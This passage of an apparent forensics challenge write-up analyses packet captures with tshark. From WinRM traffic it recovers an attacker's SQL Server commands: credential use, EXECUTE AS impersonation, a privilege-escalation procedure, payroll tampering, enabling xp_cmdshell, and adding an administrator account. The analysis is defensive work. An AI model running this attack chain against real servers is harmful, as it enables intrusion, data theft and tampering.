</div><div><br /></div><div><div>The above command produced an output with many characters that did not seem to make sense. However, identifying items that matters, we see</div></div><div><br /></div><div><div>"<b><i>cure Key.shift Passwmord1337an</i></b>" and "<i>weird acoming fronm you ...skql</i>". Not sure what these mean right now. </div><div><br /></div><div>However, back to the packet analysis of another session.</div><div><br /></div><div>10.240.240.5:49704 <-> 10.240.240.4:5985</div><div><br /></div><div>Writing this session out to a file</div></div><div><br /></div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5-4.pcap -Y '(ip.addr==10.240.240.5) && (tcp.port==49704) && (ip.addr==10.240.240.4) && (tcp.port==5985)' -w 5_49704-4_5985.pcapng</span>
</pre></div>
</div><div><br /></div><div><div>Glancing at the protocol hierarchy. This allows me to get a quick overview of what I may be able to expect in this packets.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5_49704-4_5985.pcapng -q -z io,phs </span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Protocol Hierarchy Statistics</span>
<span style="color: white;">Filter: </span>
<span style="color: white;">eth frames:768 bytes:559854</span>
<span style="color: white;"> ip frames:768 bytes:559854</span>
<span style="color: white;"> tcp frames:768 bytes:559854</span>
<span style="color: white;"> http frames:190 bytes:79651</span>
<span style="color: white;"> xml frames:190 bytes:79651</span>
<span style="color: white;"> tcp.segments frames:187 bytes:76189</span>
<span style="color: white;">===================================================================</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the date and time of this session from the local time perspective.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5_49704-4_5985.pcapng -t ad | more </span>
<span><span style="color: white;"> 1 </span><b><span style="color: #fcff01;">2023-07-23 19:13:04.820382</span></b><span style="color: white;"> 10.240.240.5 → 10.240.240.4 TCP 66 49704 → 5985 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM</span></span>
</pre></div>
</div><div><br /></div><div><div>Looking at the time from UTC</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5_49704-4_5985.pcapng -t ud | more </span>
<span style="color: white;"> 1 </span><span style="color: #fcff01;"><b>2023-07-23 23:13:04.820382</b></span><span style="color: white;"> 10.240.240.5 → 10.240.240.4 TCP 66 49704 → 5985 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM</span>
</pre></div>
</div><div><br /></div><div><div>The session with the <i>log.txt</i> ended around 23:12 UTC. This session is starting at 23:13 UTC. This means it started just after the other ended.</div><div><br /></div><div>From the protocol hierarchy, we see HTTP. If there is HTTP then we should see some methods, etc., </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5_49704-4_5985.pcapng -t ud -T fields -e http.request.method | sort | uniq --count </span>
<span style="color: white;"> 673 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">95 POST</span></b></span>
</pre></div>
</div><div><br /></div><div><div>95 POST. Ok, let's see what is going on here. Looking at two of these POST message, we see.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5_49704-4_5985.pcapng -t ud -Y 'http.request.method==POST'</span>
<span><span style="color: white;"> 10 2023-07-23 23:13:04.821860 10.240.240.5 → 10.240.240.4 HTTP/XML 664 </span><b><span style="color: #fcff01;">POST /wsman?PSVersion=5.1.22621.1778</span></b><span style="color: white;"> HTTP/1.1 </span></span>
<span><span style="color: white;"> 19 2023-07-23 23:13:05.281275 10.240.240.5 → 10.240.240.4 HTTP/XML 721 </span><b><span style="color: #fcff01;">POST /wsman?PSVersion=5.1.22621.1778</span></b><span style="color: white;"> HTTP/1.1 </span></span>
</pre></div>
</div><div><br /></div><div><div>Expanding Frame 10, to see what else we can learn, we see "<i>Microsoft WinRM Client</i>" and "<i>PS Remoting version 5.1"</i> being used to connect from <i>10.240.240.5</i> to <i>10.240.240.4</i>. If we pay close attention below, we see the base64 credentials have been decoded by TShark, hence we have the credentials "<i>littlenewman:password</i>" being used to connect to Windows device. </div></div><div><br /></div><div>Evidence in the log analysis shows this account <i>littlenewman </i>with password <i>password </i>was created as a result of the <i>Win11Updates.exe</i> file, which was executed on Jerry-PC.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5_49704-4_5985.pcapng -t ud -Y 'frame.number==10' -V | sed '1,96d;121,$d' </span>
<span style="color: white;">Hypertext Transfer Protocol</span>
<span style="color: white;"> POST /wsman?PSVersion=5.1.22621.1778 HTTP/1.1\r\n</span>
<span style="color: white;"> [Expert Info (Chat/Sequence): POST /wsman?PSVersion=5.1.22621.1778 HTTP/1.1\r\n]</span>
<span style="color: white;"> [POST /wsman?PSVersion=5.1.22621.1778 HTTP/1.1\r\n]</span>
<span style="color: white;"> [Severity level: Chat]</span>
<span style="color: white;"> [Group: Sequence]</span>
<span style="color: white;"> Request Method: POST</span>
<span style="color: white;"> Request URI: /wsman?PSVersion=5.1.22621.1778</span>
<span style="color: white;"> Request URI Path: /wsman</span>
<span style="color: white;"> Request URI Query: PSVersion=5.1.22621.1778</span>
<span style="color: white;"> Request URI Query Parameter: PSVersion=5.1.22621.1778</span>
<span style="color: white;"> Request Version: HTTP/1.1</span>
<span style="color: white;"> Connection: Keep-Alive\r\n</span>
<span style="color: white;"> Content-Type: application/soap+xml;charset=UTF-8\r\n</span>
<span style="color: white;"> User-Agent: Microsoft WinRM Client\r\n</span>
<span style="color: white;"> Content-Length: 7910\r\n</span>
<span style="color: white;"> [Content length: 7910]</span>
<span style="color: white;"> Host: 10.240.240.4:5985\r\n</span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">Authorization: Basic bGl0dGxlbmV3bWFuOnBhc3N3b3Jk\r\n</span></b></span><b><span style="color: #fcff01;">
<span> Credentials: littlenewman:password</span></span></b>
<span style="color: white;"> \r\n</span>
<span style="color: white;"> [Full request URI: http://10.240.240.4:5985/wsman?PSVersion=5.1.22621.1778]</span>
<span style="color: white;"> [HTTP request 1/1]</span>
<span style="color: white;"> File Data: 7910 bytes</span>
</pre></div>
</div><div><br /></div><div><div>With 7910 bytes, it is only fair that we look into this to see what is there. Looking at the data from the perspective of YAML.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">$ tshark -n -r 5_49704-4_5985.pcapng -t ud -q </span><b><span style="color: #fcff01;">-z follow,tcp,yaml,0</span></b><span style="color: white;"> | more</span></span>
<span style="color: white;">peers:</span>
<span style="color: white;"> - peer: 0</span>
<span style="color: white;"> host: 10.240.240.5</span>
<span style="color: white;"> port: 49704</span>
<span style="color: white;"> - peer: 1</span>
<span style="color: white;"> host: 10.240.240.4</span>
<span style="color: white;"> port: 5985</span>
<span style="color: white;">packets:</span>
<span style="color: white;"> - packet: 4</span>
<span style="color: white;"> peer: 0</span>
<span style="color: white;"> timestamp: 1690153984.821707964</span>
<span style="color: white;"> data: !!binary |</span>
<span style="color: white;"> UE9TVCAvd3NtYW4/UFNWZXJzaW9uPTUuMS4yMjYyMS4xNzc4IEhUVFAvMS4xDQpDb25uZWN0aW9u</span>
<span style="color: white;"> OiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3NvYXAreG1sO2NoYXJzZXQ9</span>
<span style="color: white;"> VVRGLTgNClVzZXItQWdlbnQ6IE1pY3Jvc29mdCBXaW5STSBDbGllbnQNCkNvbnRlbnQtTGVuZ3Ro</span>
<span style="color: white;"> OiA3OTEwDQpIb3N0OiAxMC4yNDAuMjQwLjQ6NTk4NQ0KQXV0aG9yaXphdGlvbjogQmFzaWMgYkds</span>
<span style="color: white;"> MGRHeGxibVYzYldGdU9uQmhjM04zYjNKaw0KDQo=</span>
<span style="color: white;"> - packet: 5</span>
<span style="color: white;"> peer: 0</span>
<span style="color: white;"> timestamp: 1690153984.821860075</span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">data: !!binary |</span></b></span><b><span style="color: #fcff01;">
<span> PHM6RW52ZWxvcGUgeG1sbnM6cz0iaHR0cDovL3d3dy53My5vcmcvMjAwMy8wNS9zb2FwLWVudmVs</span>
<span> b3BlIiB4bWxuczphPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzA4L2FkZHJl</span>
<span> c3NpbmciIHhtbG5zOnc9Imh0dHA6Ly9zY2hlbWFzLmRtdGYub3JnL3diZW0vd3NtYW4vMS93c21h</span>
<span> bi54c2QiIHhtbG5zOnA9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2JlbS93c21hbi8x</span>
<span> L3dzbWFuLnhzZCI+PHM6SGVhZGVyPjxhOlRvPmh0dHA6Ly8xMC4yNDAuMjQwLjQ6NTk4NS93c21h</span>
<span> bj9QU1ZlcnNpb249NS4xLjIyNjIxLjE3Nzg8L2E6VG8+PHc6UmVzb3VyY2VVUkkgczptdXN0VW5k</span>
<span> ZXJzdGFuZD0idHJ1ZSI+aHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9wb3dlcnNoZWxsL01p</span>
<span> Y3Jvc29mdC5Qb3dlclNoZWxsPC93OlJlc291cmNlVVJJPjxhOlJlcGx5VG8+PGE6QWRkcmVzcyBz</span>
<span> Om11c3RVbmRlcnN0YW5kPSJ0cnVlIj5odHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0</span>
<span> LzA4L2FkZHJlc3Npbmcvcm9sZS9hbm9ueW1vdXM8L2E6QWRkcmVzcz48L2E6UmVwbHlUbz48YTpB</span>
<span> Y3Rpb24gczptdXN0VW5kZXJzdGFuZD0idHJ1ZSI+aHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcv</span>
<span> d3MvMjAwNC8wOS90cmFuc2Zlci9DcmVhdGU8L2E6QWN0aW9uPjx3Ok1heEVudmVsb3BlU2l6ZSBz</span>
<span> Om11c3RVbmRlcnN0YW5kPSJ0cnVlIj41MTIwMDA8L3c6TWF4RW52ZWxvcGVTaXplPjxhOk1lc3Nh</span>
<span> Z2VJRD51dWlkOjM2QjQwNzg4LUVBM0MtNDIyRC1BOTY1LTc1NUQ2RDhCMkJDNzwvYTpNZXNzYWdl</span>
<span> SUQ+PHc6TG9jYWxlIHhtbDpsYW5nPSJlbi1VUyIgczptdXN0VW5kZXJzdGFuZD0iZmFsc2UiIC8+</span>
<span> PHA6RGF0YUxvY2FsZSB4bWw6bGFuZz0iZW4tVVMiIHM6bXVzdFVuZGVyc3RhbmQ9ImZhbHNlIiAv</span>
<span> PjxwOlNlc3Npb25JZCBzOm11c3RVbmRlcnN0YW5kPSJmYWxzZSI+dXVpZDowN0UwMUREMC05RDA5</span>
<span> LTQ0REYtQTAxNy00NERGRUQxNzlDNTA8L3A6U2Vzc2lvbklkPjxwOk9wZXJhdGlvbklEIHM6bXVz</span>
<span> dFVuZGVyc3RhbmQ9ImZhbHNlIj51dWlkOkY5QzIyRTAxLTFBRkItNDNDNy04QzdCLTAxRjRENDk0</span>
<span> RTYzRTwvcDpPcGVyYXRpb25JRD48cDpTZXF1ZW5jZUlkIHM6bXVzdFVuZGVyc3RhbmQ9ImZhbHNl</span>
<span> Ij4xPC9wOlNlcXVlbmNlSWQ+PHc6T3B0aW9uU2V0IHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5v</span>
<span> cmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHM6bXVzdFVuZGVyc3RhbmQ9InRydWUiPjx3Ok9w</span>
<span> dGlvbiBOYW1lPSJwcm90b2NvbHZlcnNpb24iIE11c3RDb21wbHk9InRydWUiPjIuMzwvdzpPcHRp</span>
<span> b24+PC93Ok9wdGlvblNldD48dzpPcGVyYXRpb25UaW1lb3V0PlBUMTgwLjAwMFM8L3c6T3BlcmF0</span>
<span> aW9uVGltZW91dD48cnNwOkNvbXByZXNzaW9uVHlwZSBzOm11c3RVbmRlcnN0YW5kPSJ0cnVlIiB4</span>
<span> bWxuczpyc3A9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC4=</span></span></b>
</pre></div>
</div><div><br /></div><div><div>What we want is the data from above. Here is how we can get that using<i> yq</i>.</div></div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>$ tshark -n -r 5_49704-4_5985.pcapng -t ud -q -z follow,tcp,yaml,0 | \</span></span></pre><pre style="line-height: 125%; margin: 0px;"><span><span><span style="color: #fcff01;"><b>yq -e ".packets[0].data" </b></span><span style="color: white;">| cut --fields 2 --delimiter '"' | sed 's/\\n//g' | \</span></span></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>base64 --decode</span></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">
<span style="font-weight: bold;">POST</span> <span>/wsman?PSVersion=5.1.22621.1778</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">Content-Type</span><span>:</span> <span>application/soap+xml;charset=UTF-8</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Microsoft WinRM Client</span>
<span style="font-weight: bold;">Content-Length</span><span>:</span> <span>7910</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.240.240.4:5985</span>
<span style="font-weight: bold;">Authorization</span><span>:</span> <span>Basic bGl0dGxlbmV3bWFuOnBhc3N3b3Jk</span></span>
</pre></div>
</div><div><br /></div><div><div>After reviewing this session from the client perspective, nothing meaningful was found from either the client or the server side of the connection.</div><div><br /></div><div>Trying another session as there were three WinRM sessions.</div><div><br /></div><div>Looking at : 10.240.240.5:49706 <-> 10.240.240.4:5985 </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5-4.pcap -Y '(ip.addr==10.240.240.5) && (tcp.port==49706) && (ip.addr==10.240.240.4) && (tcp.port==5985)' -w 5_49706-4_5985.pcapng</span>
</pre></div>
</div><div><br /></div><div><div>When did this session start?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5_49706-4_5985.pcapng -t ud -c 1</span>
<span style="color: white;"> 1 </span><span style="color: #fcff01;"><b>2023-07-23 23:13:05.285031</b></span><span style="color: white;"> 10.240.240.5 → 10.240.240.4 TCP 66 49706 → 5985 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM</span>
</pre></div>
</div><div><br /></div><div><div>This session is definitely more interesting than the first. Here are the commands which were run. Below I placed comments to better understand the commands.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5_49706-4_5985.pcapng -q -z follow,tcp,ascii,0 | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">grep --perl-regexp '<rsp:Command>.*?<' --color=always --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">awk --field-separator='<rsp:Command>' '{ print $2 }' | tr --delete '<' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sed 's/&quot;//g' | sed 's/prompt//g' | sed 's/&apos;//g'</span>
</pre></div></div><div><div><i><br /></i></div><div><i>whoami</i></div><div>Comment: Identifies the currently logged in user</div><div><br /></div><div><i>hostname</i></div><div>Comment: Identifies the hostname of the computing device</div><div><br /></div><div><i>Set-ExecutionPolicy</i></div><div>Comment: I was expecting here to see the policy being set specifically, however, I don't see that here. Fortunately, this was identified in the log analysis sesction.</div><div><br /></div><div><i>Import-Module</i></div><div>Comment: Similarly, I expected some module being imported. </div><div><br /></div><div><i>$ConnectionString = Server=10.240.240.6;User=JerrySQL;Password=SecurePassword1337;TrustServerCertificate=True</i></div><div>Comment: Setting up of a connection string to authenticate to the SQL Server at 10.240.240.6.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query SELECT SUSER_SNAME()</i></div><div>Comment: Querying the login name of the current security context. I would expect this is just confirmation of JerrySQL.</div><div><br /></div><div>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query SELECT name, SUSER_SNAME(owner_sid) AS DatabaseOwner FROM sys.databases;</div><div>Comment: List all databases and get the owner information.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Customers; SELECT name AS TableName FROM sys.tables;</i></div><div>Comment: Using the <i>Seinfeld_Customers </i>database, select the names of all tables from <i>sys.tables</i>. </div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; SELECT name AS TableName FROM sys.tables;</i></div><div>Comment: Using the <i>Seinfeld_Employees</i> database, select the names of all tables from <i>sys.tables</i>.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; SELECT a.name AS UserName, b.name AS RoleName FROM sys.database_role_members drm JOIN sys.database_principals a ON drm.member_principal_id = a.principal_id JOIN sys.database</i></div><div>Comment: Run a query to extract information about roles and principal_id. </div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = Data;</i></div><div>Comment: Extract information about the fields/columns from the Data table.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; SELECT id, Name, Position from Data;</i></div><div>Comment: Extract information on employees ID, Name and Position from the Data table.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = Payroll;</i></div><div>Comment: Grab information about the Payroll table columns in the Seinfeld_Employees database.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; SELECT id, Salary from Payroll;</i></div><div>Comment: Select only the id, Salary fields from the Payroll table.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; SELECT a.Name, b.Salary FROM Data a LEFT JOIN Payroll b ON b.id = a.id;</i></div><div>Comment: Select information on employees name and salary from both the Data and Payroll tables.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; UPDATE Payroll SET Salary = 123456 WHERE id = 5;</i></div><div>Comment: Wicked, I get to set my own salary? I envy Newman. At this point, the employee salary is updated?</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query USE Seinfeld_Employees; SELECT a.Name, b.Salary FROM Data a LEFT JOIN Payroll b ON b.id = a.id;</i></div><div>Comment: Validation that the update in salary was successful.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query SELECT name, type_desc FROM sys.server_principals WHERE type IN (S, U)</i></div><div>Comment: Querying the Server Principals. Looking at Microsoft's site, the <i>server_principals </i>type does not show "U". S=SQL Login.</div><div>If we instead look at the <i>database_principals</i>, we see "S = SQL user", "U = Windows user"</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query SELECT DISTINCT grantor.name AS GrantorName, grantee.name AS GranteeName FROM sys.server_permissions perm JOIN sys.server_principals grantor ON perm.grantor_principal_id = grantor.principal_id JOIN</i></div><div>Comment: Query information on permissions.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL SELECT SUSER_SNAME(); REVERT;</i></div><div>Comment: Attempt to login as user GeorgeSQL then valididate the security context matches GeorgeSQL. Once completed, revert back to JerrySQL as the login user.</div><div><br /></div><div>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; USE Seinfeld_Employees; SELECT u.name AS UserName, r.name AS RoleName FROM sys.database_role_members drm JOIN sys.database_principals u ON drm.member_principal_id = </div><div>Comment: Using <i>GeorgeSQL </i>o the <i>Seinfeld_Employees</i> table query the username and roles</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; SELECT name as DatabaseName, SUSER_SNAME(owner_sid) AS DatabaseOwner, is_trustworthy_on AS TRUSTWORTHY from sys.databases; REVERT;</i></div><div>Comment: Select database owner information that <i>GeorgeSQL</i> can see. Also check via the "<i>is_trustworthy_on</i>" attribute, if SQL Trusts the datbase and its contents.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query $Query </i></div><div>Comment: Hmmm! I can't remember seeing seeing a $Query variable defined above. Is this an attempt to hide information on the previous queries? It looks so! Or did I miss something?!</div><div><br /></div><div>While above only shows the commands and my interpretation of the objectives. I was unable to identify any response which would be decoded to reflect the response for these commands. Actually, I find this very strange. Maybe I just needed to pay closer attention to the output. In reality the response does not really matter much to me at this time, unless I'm concerned about confirmation of exfiltration. For now I will consider me not being able to detect the response as a minor setback.</div><div><br /></div></div><div><div>Writing the final WinRM session out to file for analysis.</div></div><div><br /></div><div>10.240.240.5:49705 <-> 10.240.240.4:5985</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5-4.pcap -Y '(ip.addr==10.240.240.5) && (tcp.port==49705) && (ip.addr==10.240.240.4) && (tcp.port==5985)' -w 5_49705-4_5985.pcapng</span>
</pre></div>
</div><div><br /></div><div><div>What time did this activity start?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5_49705-4_5985.pcapng -t ud -c 1</span>
<span><span style="color: white;"> 1 </span><b><span style="color: #fcff01;">2023-07-23 23:13:05.207334</span></b><span style="color: white;"> 10.240.240.5 → 10.240.240.4 TCP 66 49705 → 5985 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM</span></span>
</pre></div>
</div><div><br /></div><div><div>This started at 23:13:05 on July 23, 2023. What are the command which were run?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5_49705-4_5985.pcapng -q -z follow,tcp,ascii,0 | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">grep --perl-regexp '<rsp:Command>.*?<' --color=always --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">awk --field-separator='<rsp:Command>' '{ print $2 }' | tr --delete '<' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sed 's/&quot;//g' | sed 's/prompt//g' | sed 's/&apos;//g'</span>
</pre></div>
</div><div><br /></div><div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; USE Seinfeld_Employees; SELECT IS_SRVROLEMEMBER(sysadmin) as isSysadmin; EXEC Going_Up; SELECT IS_SRVROLEMEMBER(sysadmin) as isSysadmin; USE master; REVERT;</i></div><div>Comment: Still using <i>GeorgeSQL</i>. Looking for informaton on sysadmins and ultimately connect to the "master" . <br />What is this "Going_Up"? Fortuntately, this was identified during the analysis of the logs from the SQL Server.</div><div>With access to the "<i>master</i>" database, this user now have the keys to the kingdom. Basically full access.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; USE Seinfeld_Customers; SELECT name AS TableName FROM sys.tables; USE master; REVERT;</i></div><div>Comment: Extract the tables from <i>Seinfeld_Customers</i>, once again switch to "master" then revert to the original user.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; USE Seinfeld_Customers; SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = Data; USE master; REVERT;</i></div><div>Comment: Looks like some of this information being requested is similar to what was requested in the previous session. This time using <i>GeorgeSQL </i>account and also switching to the "master" database.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; USE Seinfeld_Customers; SELECT * from Data; USE master; REVERT;</i></div><div>Comment: Select all fields from the Data table</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; USE Seinfeld_Customers; SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = Secret; USE master; REVERT;</i></div><div>Comment: Grabbing information on the table named secret. </div><div>Considering I did not find information relating to the results returned so far. I'm going to assume this information was learned from what was returned by some of the previous commands. As previously, there was no attempt to access the table named "Secret". Maybe this is something only visible to those with "sysadmin" permission.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; USE Seinfeld_Customers; SELECT * from Secret; USE master; REVERT;</i></div><div>Comment: Grab all informtion from the "Secret" table. Are there passwords here?</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; EXEC sp_configure show advanced options, 1; RECONFIGURE; EXEC sp_configure xp_cmdshell; REVERT;</i></div><div>Comment: "<i>sp_configure</i>" is used to view or change configuration settings on the server. It looks like the attacker is looking at "advanced options" then ultimately running the "<i>xp_cmdshell</i>" to gain access to the Windows command prompt.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; EXEC sp_configure xp_cmdshell, 1; RECONFIGURE; REVERT;</i></div><div>Comment: Not sure why this is run here ...</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; EXEC sp_configure xp_cmdshell; REVERT;</i></div><div>Comment: ... and here. I take this to mean it is either testing or that was not sure what is the string to pass to the command.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; EXEC xp_cmdshell whoami; EXEC xp_cmdshell net user NewUser NewPassword /add &amp;&amp; net localgroup Administrators NewUser /add; REVERT;</i></div><div>Comment: We see a number of commands are run via the shell:</div><div><span 